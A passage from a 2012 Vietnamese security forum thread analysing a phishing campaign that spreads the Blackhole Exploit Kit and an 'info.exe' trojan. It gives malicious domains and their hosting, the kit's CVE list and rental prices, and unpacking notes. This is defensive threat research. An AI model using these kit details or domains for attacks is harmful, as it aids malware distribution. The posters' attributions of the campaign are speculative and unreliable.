Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS]
URL: http://www.fasthosts.co.uk
2. Thông tin kết nối port:
fb-sv07.co.uk
Port 22: SSH-2.0-OpenSSH_5.3
Port 80: nginx/0.8.54
---> http://fb-sv07.co.uk/installation/index.php
fb-sv09.co.uk
Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5
Port 80: Server: nginx/0.6.32
fb-sv10.co.uk
Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308
Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT
Port 80: Server: nginx/1.1.18
3. Thông tin hosting:
fb-sv07.co.uk (83.69.226.219)
LTD AWAX Telecom
Moscow, Orlovo-Davydovsky per., 2/5 str
129110 Moscow, Russia
+7 495 6264747
+7 495 6264747
fb-sv10.co.uk (79.137.213.115)
Digital Network NOC
13a, Yaroslavskaya st.,
Moscow, Russia, 129366
+7 495 660 8383
+7 495 660 8383
fb-sv02.com (146.185.249.34)
Petersburg Internet Network ltd.
PIN ROLE
Russia, SPb, Sedova 80
4. Reference:
http://google.com/safebrowsing/diagnostic?site=zaminnews.com/
Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/
http://google.com/safebrowsing/diagnostic?site=eccie.net/
Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/.
http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/
Malicious software includes 92 trojan(s), 48 scripting exploit(s).
Theo em thì chắc đây là một tổ chức hacker đánh thuê của Nga
Còn STL có thuê bọn này hay không thì chúng ta cần analyze tiếp dựa trên thông tin tài khoản Facebook đã post comment và payload (info.exe) của BlackHole Kit. |
|
|
|
|
[Discussion] Một dạng fish khá mới |
14/04/2012 13:45:29 (+0700) | #26 | 261380 |
miyumi2
Member
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
Một số thông tin về BlackHole Exploit Kit được cài trên máy chủ fb-sv10.co.uk:
1. Các exploit được sử dụng để phát tán malware phiên bản 1.x.x:
CVE-2006-0003
MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution
CVE-2007-5659/2008-0655
PDF Exploit -collab, collectEmaillnfo
CVE-2008-2992
PDF Exploit• util.printf
CVE-2009-0927
PDF Exploit- collab.getlcon
CVE-2010-0188
PDF Exploit - LibTiff Integer Overflow
CVE-2010-0842
JAVA MIDI Java OBE
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27
CVE-2010-1885
Help Center URL Validation Vulnerability
CVE-2011-0559
Flash 10 by exm
Denial of service (memory corruption) via crafted parameters
CVE-2011-3544
Vulnerability in the Rhino Script Engine
CVE-2012-0507
Java Atomic
CVE-2010-0840
JAVA TC (?) javagetval OBE Java invoke / Java Trust
Trusted Method Chaining - Java getValue Remote Code Execution
CVE-2010-0886
Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components
CVE-2010-3552
JAVA SKYLINE
Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows
2. Minh họa:
http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png
Blackhole Exploit Kit control panel
http://imperva.typepad.com/.a/6a01156f8c7ad8970c0162fdb83241970d-pi
3. Giá bán/cho thuê:
1,500 usd/1 năm
1,000 usd/6 tháng
700 usd/3 tháng
4. Reference:
Danh sách các Exploit Kit và CVE:
http://www.mediafire.com/?vwizwswtwx9p1q3
Deconstructing the Black Hole Exploit Kit
http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html
Blackhole 1.2.3 released
http://xylibox.blogspot.com/2012/03/blackhole-v123.html
...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content').
|
|
|
|
|
[Discussion] Một dạng fish khá mới |
14/04/2012 17:55:07 (+0700) | #27 | 261393 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Không quan trọng, stl dùng, share, mua, ăn cắp gì đó thì kệ cha nó.
Cái code của info.exe unpacked rất quái, và em có thể nghi ngờ không thằng coder của stl nào có thể code được tới mức đó, dùng toàn native Ntdll API. Chỉ có tụi guru của Nga mới đủ khả năng làm việc này.
Em chỉ muốn nhắn gởi với mấy anh em sờ ti lợn, cao thủ nhiều như mây, cao nhân giấu mặt khắp nơi, nếu muốn người ta không biết thì đừng nên làm. Ba cái exploit, toolkit đã được public, đã document đầy ra đấy chỉ là chuyện nhỏ ! Zero-Day còn chưa sợ nữa là !
Em cũng mong tới một lúc nào đó mấy anh release cở Stuxnet, Duqu, dùng unknown programming language cho mấy anh em cao thủ trẻ tuổi ở đây hứng thú, vất vã cho vui. |
|
|
|
|
[Discussion] Một dạng fish khá mới |
15/04/2012 06:28:38 (+0700) | #28 | 261412 |
miyumi2
Member
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
Ngoài kết quả phân tích tự động bằng sandbox trên ThreatExpert như bolzano đã gửi:
http://www.threatexpert.com/report.aspx?md5=46a69641d00f656e5e9b6fedd12f96f3
Trojan này còn hook 1 số hàm API tương đối đặc biệt:
1. Trước khi chạy info.exe
2. Các process bị hooked sau khi chạy info.exe
|
|
|
|
|
[Discussion] Một dạng fish khá mới |
15/04/2012 11:02:43 (+0700) | #29 | 261427 |
|
minhhath
Member
|
0 |
|
|
Joined: 22/11/2010 10:03:38
Messages: 91
Location: Team unknow
Offline
|
|
Đi nhậu đi anh rồi về làm tiếp |
|
|
|
|
[Discussion] Một dạng fish khá mới |
15/04/2012 13:57:03 (+0700) | #30 | 261431 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Nhậu say mất tiêu rồi thì lấy gì làm tiếp em !
Lúc đầu tui cứ ngờ ngợ đây là code của tụi hacker Nga, không chắc là code của stl. Nhưng tới ngày hôm nay, sau khi extract từ file info.exe đã unpack, tui lại được tiếp 3 em exe nữa. Trong đó có 1 em exe em kích thước 306 KB, build = VC++ 2010, và code của em này, mặc dù không dùng static link với C RTL, dùng dynamic link với msvcrt.dll, nhưng nhiều hàm đã rất quen. Vd hàm dùng ROR, ROL để giãi mã, mã hoá chuỗi mà ta đã gặp trong fake unikey vừa rồi. Và cũng ba cái vụ zlib/gzip, can thiệp Firefox, IE, Skype... 95% là em đã gặp lại mấy anh "người quen nhưng ghét" stl này.
Mấy anh giàu ha, giờ không chơi đồ tự viết, tự chế nữa, mua đồ của xã hội đen mạng về xài ha, chỉ cần viết 1 module (exe) nhỏ làm những việc các anh cần ăn cắp, nhúng thật sâu 2-3 lớp.
Bà con có thể dùng plugin PE Extract cho PEiD của Bob để rút 3 cái exe đó ra. Dùng file info_unpacked_.exe của onlyida cũng được. File này dư 2 section của imprec do onlyida máy móc dùng OllyDump và ImpREC để dum và fix IAT.
2 myumi2: em nên Google về shimeng.dll của MS. Đó là file của MS, dùng cho update các hotfix của MS mà không cần đợi tới reboot. Nó patch ở opcode mov edi, edi đấy. |
|
|
|
|
|
|
|
Users currently in here |
2 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|